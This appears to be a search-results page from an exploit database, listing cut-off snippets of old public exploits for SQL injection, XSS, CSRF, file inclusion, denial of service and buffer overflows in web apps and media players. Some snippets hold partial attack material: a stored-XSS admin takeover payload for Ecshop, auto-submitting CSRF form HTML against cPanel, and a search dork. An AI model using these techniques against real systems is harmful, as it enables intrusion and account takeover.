1697 matches found
eFront version 3.6.6 Mullti Vulnerability
Exploit for php platform in category web applications ========================================= eFront version 3.6.6 Mullti Vulnerability ========================================= 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 3 3 3 3 7 /' \ /'\ /'\ /\ \ /\ /\ \ 7 1 /,...
osTicket Local File Inclusion
---------------------------------------------------------------------------------------------------------------------- osTicket - Open Source Support Ticket System module=osTicket&file= Local File Inclusion http://osticket.com...
yPlay 2.4.5 Denial Of Service
Exploit Title : yPlay Denial of Service Vulnerability Software : yPlay Software link : http://www.spacejock.m6.net/files/yPlayFull.exe Autor : ABDI MOHAMED Email : [email protected] greetz: netown3r , sadhacker , net-decrypt3r , xa7m3d , the commander , mr.fearfactor and all tunisian hackers...
Xerox 4595 Denial of Service Vulnerability
Exploit for hardware platform in category dos / poc ========================================== Xerox 4595 Denial of Service Vulnerability ========================================== !/usr/bin/perl Xerox 4595 Remote Dos November 1, 2010 By chap0 - The tongue has the power of life and death...
Flex Timesheet - Authentication Bypass
Flex Timesheet - Authentication Bypass =================================================== Flex Timesheet - Authentication Bypass Vulnerability =================================================== My + Author : KnocKout Contact : [email protected] + Greatz : h4x0reSEC / Inj3ct0r Team / Exploit-DB...
Microsoft MPEG Layer-3 Audio Decoder - Division By Zero
Microsoft MPEG Layer-3 Audio Decoder - Division By Zero ''' | / |/ \ /\ | | | | \ | \ / | | | | / \ | | | | | | | |/| | | | |/ /\ | | | | | | | | || / \ || | | | || ||// \/|/ http://www.exploit-db.com/moaub-24-microsoft-mpeg-layer-3-audio-decoder-division-by-zero/...
Ecshop2.7.2持久型XSS(可获得管理员帐号)
简要描述: 个人资料修改时,Javascript代码过滤不够严格,XSS代码直接进入数据库 详细说明: 密码保护问题这一项,没有使用正则过滤,其他的的都有正则过滤。我们可以在密码保护问题里输入XSS,但是后台查看会员资料是不显示密码保护问题的,所以这里必须要网站后台添加了新的 “会员注册项”时,后台查看资料就会显示了,此处填入一段引入外部js的代码:" 外部test.js文件内容如下 Ajax.call'privilege.php?act=update','id=1&username=heihei&[email protected]','',"POST","JSON"; 漏洞证明:...
DJ Studio Pro 8.1.3.2.1 SEH Overwrite
DJ Studio Pro Version 8.1.3.2.1 SEH 0 day Author Abhishek Lyall - abhilyallatgmaildotcom, infoataslitsecuritydotcom Web - http://www.aslitsecurity.com/ Blog - http://www.aslitsecurity.blogspot.com/ Download Vulnerable application from http://www.e-soft.co.uk/DJSP.htm Vulnerable version DJ Studio...
eNdonesia 8.4 - SQL Injection
======================================================================/ eNdonesia 8.4 Print Module SQL Injection Vulnerability Download : http://sourceforge.net/projects/endonesia/files/eNdonesia Version : 8.4 or lower maybe also affected Dork : mod.php?mod=publisher&op=printarticle&artid=...
QQPlayer 2.3.696.400p1 - '.wav' Denial of Service
!/usr/bin/python Exploit Title: QQPlayer 2.3.696.400p1.wav Denial of Service Vulnerability Date: 07-09-2010 Author: Hadji Samir , s-Dzathotmaildotfr Software Link: www.qq.com Version: QQPlayer 2.3.696.400p1 Tested on: Windows XP sp2 CVE : Notes: Working with filetype Mahboul-3lik.wav...
X Zero Community Classifieds 5.2 SQL Injection / Cross Site Scripting
======================================================= X·Zero Community Classifieds 5.2 XSS SQL Vulnerability ======================================================= 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ ...
EZ-Oscommerce 3.1 Changer Login and Pass CSRF Vulnerability
Exploit for php platform in category web applications =========================================================== EZ-Oscommerce 3.1 Changer Login and Pass CSRF Vulnerability ===========================================================...
hobcms / hertzCMS 1.1.9.19 File include Vulnerability
Exploit for php platform in category web applications ===================================================== hobcms / hertzCMS 1.1.9.19 File include Vulnerability ===================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /'...
MP3 Cutter 1.8 MP3 - File Processing Remote Denial of Service
MP3 Cutter 1.8 MP3 - File Processing Remote Denial of Service source: https://www.securityfocus.com/bid/41506/info MP3 Cutter is prone to a remote denial-of-service vulnerability. An attacker can exploit this issue to cause an affected application to crash, denying service to legitimate users. MP...
BS Auction - SQL Injection
BS Auction - SQL Injection ----------------------------Information------------------------------------------------ +Name : BS Auction = SQL Injection Vulnerability Exploit +Autor : Easy Laster +ICQ : 11-051-551 +Date : 06.07.2010 +Script : BS Auction +Price : $24.95 +Language :PHP +Exploit Langua...
Cpanel v11. 2 5 CSRF add administrator account exp-vulnerability warning-the black bar safety net
Cpanel v11. 2 5 CSRF add admin account vulnerability. Exploite: html body onload="javascript:fireForms" form method="POST" name="form0" action=" http://server:2082/frontend/x3/ftp/doaddftp.html" input type="hidden" name="login" value="name"/ input type="hidden" name="password" value="pass"/ input...
风讯(FooSun)GetPassword.asp页面存在任意修改密码漏洞
FoosunCMS是一款具有强大的功能的基于ASP+ACCESS/MSSQL构架的内容管理软件。 在文件\User\ GetPassword.asp中: ElseIf Request.Form"Action" = "step3" then //第28行 Call step3 …… Sub step3 //第198行 Dim ppassnew,pconfimpassnew ppassnew = md5Request.Form"passnew",16 …… UserConn.execute"Update FSMEUsers set UserPassword ='"&...
2daybiz Photo Sharing Script SQL Injection
The Demo for the exploit-db Admin : http://www.2daybiz.com/products/efota/ ----------------------------Information------------------------------------------------ +Name : 2daybiz Photo Sharing Script = SQL Injection Vulnerability Exploit +Autor : Easy Laster +ICQ : 11-051-551 +Date : 27.06.2010...
2daybiz Freelance Script SQL Injection
Demo for the Exploit-DB Admin : http://www.2daybiz.com/products/freelancer/ ----------------------------Information------------------------------------------------ +Name : 2daybiz Freelance Script = SQL Injection Vulnerability Exploit +Autor : Easy Laster +ICQ : 11-051-551 +Date : 27.06.2010...
2DayBiz ybiz Polls Script - SQL Injection
2DayBiz ybiz Polls Script - SQL Injection ----------------------------Information------------------------------------------------ +Autor : Easy Laster +ICQ : 11-051-551 +Info : http://www.2daybiz.com/pollsscript.html +Discovered by Easy Laster 4004-security-project.com +Security Group...